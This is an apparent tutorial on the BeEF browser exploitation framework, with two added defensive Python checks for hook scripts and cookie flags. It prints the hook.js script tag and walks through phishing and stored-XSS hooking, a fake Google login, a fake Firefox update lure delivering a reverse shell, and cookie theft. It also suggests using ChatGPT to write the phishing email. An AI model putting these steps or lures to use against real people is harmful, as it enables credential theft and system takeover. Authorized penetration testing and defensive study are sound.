If you want to use the BeEF hacking tool effectively, you've come to the right place. This article is here to help you make the most out of this framework.
We will explain what BeEF is, how to install it, and how to start it up. We will explore the BeEF web interface and discuss its different components. Additionally, we will explain how BeEF can hook into web browsers, and provide two methods to achieve this.
Furthermore, we will demonstrate three specific use cases of BeEF: Google phishing, creating a fake notification bar that leads to a reverse shell, and stealing session cookies.
So, if you're ready to delve into this client-side framework, let's get started.
What Is BeEF
BeEF, the Browser Exploitation Framework, is a tool ethical hackers use to assess and exploit vulnerabilities within web browsers.
Unlike many other security tools focusing on system or server-side vulnerabilities, BeEF focuses on the client side – specifically, the user's web browser. This is significant because even if a system's network or operating system is secure, vulnerabilities in a web browser can still provide an attacker with a way into the network or system.
For other Kali tools, see our post on the 25 Top Penetration Testing Tools for Kali Linux in 2023.
For ethical hackers, BeEF provides several benefits:
- In-Depth Browser Analysis: BeEF can provide detailed information about the hooked browsers, such as the browser type, version, installed plugins, whether the browser is running over Tor, cookies, etc.
- Client-Side Exploitation: BeEF has numerous command modules that can aid in exploiting web browsers. These modules can perform various tasks such as stealing cookies, conducting social engineering attacks, launching network attacks, and more.
- Real-World Simulation: BeEF allows ethical hackers to mimic real-world attack scenarios, helping organizations understand their risk postures better.
- Persistent Access: BeEF can maintain control over a hooked browser even if an IP changes, providing ongoing access to the target for further exploits.
- Easy-to-Use Interface: The BeEF interface is web-based and user-friendly, making it easier to manage hooked browsers and execute command modules.
BeEF isn’t currently preinstalled on Kali. Before installing it, update your package lists with the command:
sudo apt update
You can install BeEF with the following command:
sudo apt install beef-xss
Once BeEF is installed, you can run it by using:
When running the program for the first time, you will be prompted to change the default password for the ‘beef’ user.
Once you change the password, BeEF will start loading, and you will be presented with both the WebUI address and the hook script for ‘hook.js.’
Web UI: http://127.0.0.1:3000/ui/panel
Hook: <script src="http://127.0.0.1:3000/hook.js"></script>
Before you use the hook script, ensure you change the IP to that of the machine running BeEF.
BeEF should open the browser for you, and you will need to log in as the user ‘beef’ with the new password you set up before entering the program.
Once successfully logged in, you will be presented with the initial BeEF interface.
Let's look at the different sections within BeEF.
- Hooked Browsers: This is where you'll see a list of all currently hooked browsers. Each browser is listed with details such as IP address, browser name, and operating system. As no browsers are hooked up initially, this section will be empty.
- Getting Started: This section provides guidance on how to use the BeEF framework. It includes information on how to hook a browser and use command modules.
- Logs: This section shows a log of the BeEF activity. This includes interactions with the target browsers, commands sent, responses received, and any errors or important system messages.
- Zombies: In BeEF terminology, a "zombie" is a hooked browser that the BeEF server controls. The "Zombies" section lists these browsers and allows you to interact with them. As no browsers are hooked yet, this section will also be empty.
- Basic: This view provides basic information about the hooked browser, such as the IP address, browser type, and operating system. In this view, you can also use the available command modules to interact with the hooked browser.
- Requester: The "Requester" view lets you manually craft and send HTTP requests from the hooked browser. This can be useful for exploring the website or web application from the perspective of the hooked browser, testing access controls, or performing other manual testing tasks.
Once you've hooked a browser, the "Hooked Browsers" and "Zombies" sections will be populated with information, and you'll be able to interact with the hooked browsers using the BeEF command modules.
The techniques and knowledge shared in this article should only be employed on systems for which you have obtained explicit permission to test or on systems you own.
Unauthorized access is illegal and could lead to legal implications. We strongly urge you to respect digital boundaries.
Hooking Web Browsers with BeEF
Now that you know how to install and start BeEF, let’s explore how to exploit a browser by hooking into it.
What Is Browser Exploitation?
Browser exploitation refers to taking advantage of security vulnerabilities in a web browser to perform unauthorized actions. This can involve various techniques, typically to gain control over the browser or the system on which it's running or to steal sensitive information.
The basic concept behind browser exploitation is that a web browser, like any software, can have flaws or vulnerabilities in its code. These vulnerabilities could cause the browser to behave in unintended ways.
Hooking the Browser
BeEF provides links to demo pages within the "Getting Started" section, which we can use to show a proof of concept. In a real-world engagement, setting up a website or web server to serve the ‘hook.js’ code is a more realistic way of tricking the victim into being hooked.
This can be accomplished by creating a website, adding the hook script to the header of the page, and then having the victim visit the site by means of a phishing attack. This could be through a link sent via email, social media, or other means.
First, let's copy the link for the advanced demo page. You must change the IP address to the one from your attacking machine. This page includes the embedded hook.js script.
Next, you need to find a way to get the user to click on this link. How about using ChatGPT to help craft a phishing email to company employees, letting them know about a contest?
If you want to see other ways to use social engineering, see our post Unlock SET: How to Use The Social Engineer Toolkit.
We can disguise the original URL by using a URL shortener.
Once the user clicks on the link, they won’t be taken to a contest page but to the BeEF demo page, and then it’s game over because we will now have control over their browser.
We could get creative here and create a legitimate-looking contest form, enabling us to hook into the user’s browser and harvest some information via the form simultaneously.
Once the user’s browser is hooked, the browser appears in the BeEF console.
From the details pane, BeEF provides us with a wealth of information. Valuable insights include the browser being utilized, its version, the operating system it runs on, its architecture, platform information, language details, installed plugins, and much more.
Hooking With XSS
Let’s look at how an attacker could use stored XSS and BeEF to hook a browser. This method can be very effective as it can infect many users.
When the victim's browser visits the site, it loads the file and hooks the browser, enabling us to execute various commands to launch attacks or exfiltrate data.
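From the defender's side, the hook described above is an ordinary script element whose src points at a host the site does not control. The following Python check is an added example, not code from the original article or from BeEF: it scans a rendered page for external scripts outside an allowlist and flags the default hook.js filename and port 3000 shown earlier. The allowlist, host names and sample page are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hosts this site legitimately loads scripts from (constructed).
ALLOWED_SCRIPT_HOSTS = {"www.example.test", "cdn.example.test"}

class ScriptAudit(HTMLParser):
    """Collect external <script> tags that look like an injected hook."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag != "script" or not src:
            return  # inline scripts are out of scope for this check
        parts = urlsplit(src.strip())
        host = parts.hostname or self.page_host  # relative URL = same host
        try:
            port = parts.port
        except ValueError:  # malformed port in the URL
            port = None
        reasons = []
        if host not in ALLOWED_SCRIPT_HOSTS:
            reasons.append("host not in allowlist")
        if parts.path.rsplit("/", 1)[-1].lower() == "hook.js":
            reasons.append("default hook.js filename")
        if port == 3000:
            reasons.append("default BeEF port 3000")
        if reasons:
            self.findings.append((src, reasons))

def audit_page(html, page_host):
    """Return [(src, [reasons])] for suspicious script tags in one page."""
    parser = ScriptAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: a stored comment carrying a hook tag (192.0.2.0/24 is a documentation range).
SAMPLE_PAGE = """<html><head><script src="/static/app.js"></script>
<script src="https://cdn.example.test/lib.js"></script></head>
<body><div class="comment">Nice post!
<script src="http://192.0.2.10:3000/hook.js"></script></div></body></html>"""

if __name__ == "__main__":
    for src, reasons in audit_page(SAMPLE_PAGE, "www.example.test"):
        print(src, "->", ", ".join(reasons))
```

The filename and port checks only catch an unmodified default setup; the allowlist comparison is the part that still works when those are changed, and it maps directly onto a Content-Security-Policy script-src directive.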
Exploiting Browser Sessions With BeEF
BeEF comes preloaded with over three hundred modules that you can run depending on the browser hooked. These are broken down into twelve categories, including Exploits, Network, and Social Engineering.
The command modules all include a traffic light icon that shows whether the module will be invisible to the user and whether it will work within the target browser.
We will show you how to use three of these modules.
The Google Phishing command is a module within BeEF that aims to trick the user of a hooked browser into revealing their Google credentials.
Let’s execute the command; the victim should then be presented with the fake login page in their browser.
If the user attempts to sign in, we will have their credentials in the command results tab of the “Google Phishing” module.
Fake Notification Bar
The Fake Notification Bar command is another module within BeEF designed for social engineering attacks.
When this module is executed on a hooked browser, it displays a fake notification bar at the top of the target browser window. The content of this notification bar can be customized and designed to trick the user into clicking a link or downloading a file.
For our demo, we will be using a reverse shell payload. If the user is tricked into downloading and running the file, it will open a reverse shell to our machine. A reverse shell allows us to execute commands remotely on the victim's system, giving us complete control over it.
For more information on reverse shells, see our reverse shell cheat sheet.
We will use the “Fake Notification Bar (Firefox)” module as the user’s browser is Firefox, but choose whichever applies to your situation.
Please ensure that you set the “Plugin URL” to the location of the reverse shell. You can leave the “Notification text” or change it to fit your needs.
We changed our text to read: Critical Security Alert: Your Firefox browser is critically outdated! Click here to install the urgent security update now.
Once we click ‘Execute,’ the user will be presented with a notification bar.
The user will be prompted to install the plugin by saving the file to their computer.
Once the user attempts to install the update, we will have a reverse Meterpreter shell giving us full control of the user’s system.
Session cookies, also known as temporary cookies, store information about a user's activity for a single browsing session. They help websites remember a user's actions, such as login information or items added to a shopping cart, and are deleted when the browser is closed.
We can use the “Get Cookie” module within BeEF to steal session cookies from the user’s browser. Select “Get Cookie” and press the “Execute” button. The session cookies will be displayed in the “Command results” window.
From an attacker’s perspective, these cookies are valuable as having them allows the attacker to impersonate a user on a website (such as an e-commerce site or the member section of a forum) by taking over the session.
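Any script running in a page, a hook script included, can only read cookies that were set without the HttpOnly attribute. The following Python audit is an added example, not part of the original article: it parses Set-Cookie header values and reports which cookies are script-readable, which are session cookies, and which lack Secure or SameSite. The cookie names and values are constructed.

```python
def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, {attribute: value})."""
    first, *rest = [part.strip() for part in header.split(";")]
    name = first.partition("=")[0].strip()
    attrs = {}
    for part in rest:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs


def audit_cookie(header):
    """Describe how exposed one cookie is to script running in the page."""
    name, attrs = parse_set_cookie(header)
    issues = []
    if "httponly" not in attrs:
        issues.append("no HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        issues.append("no Secure: also sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("SameSite is not Lax or Strict")
    return {
        "name": name,
        # No Expires/Max-Age means the browser drops it when the session ends.
        "session_cookie": "expires" not in attrs and "max-age" not in attrs,
        "issues": issues,
    }


def script_readable(headers):
    """Names of cookies that any script in the page could read."""
    return [parse_set_cookie(h)[0] for h in headers
            if "httponly" not in parse_set_cookie(h)[1]]


# Constructed sample response headers (names and values are made up).
SAMPLE_HEADERS = [
    "SESSIONID=abc123; Path=/",
    "cart=42; Path=/; Max-Age=3600; Secure; SameSite=Lax",
    "auth=xyz; Path=/; HttpOnly; Secure; SameSite=Strict",
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(audit_cookie(header))
    print("script-readable:", script_readable(SAMPLE_HEADERS))
```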
The Browser Exploitation Framework, or BeEF, is a powerful tool for ethical hackers, providing a range of capabilities for exploring and hacking web browsers' vulnerabilities.
Throughout this article, we've shown you how to use the BeEF tool to perform three different attacks, one of which enables you to take full control of the user's computer.
However, the capabilities of BeEF extend far beyond what we've explored here. Diving deeper into its options and functionalities can significantly enhance your proficiency in using the BeEF hacking tool.
By investing time in experimenting with and understanding these additional features, you can elevate your skills and expand your toolkit.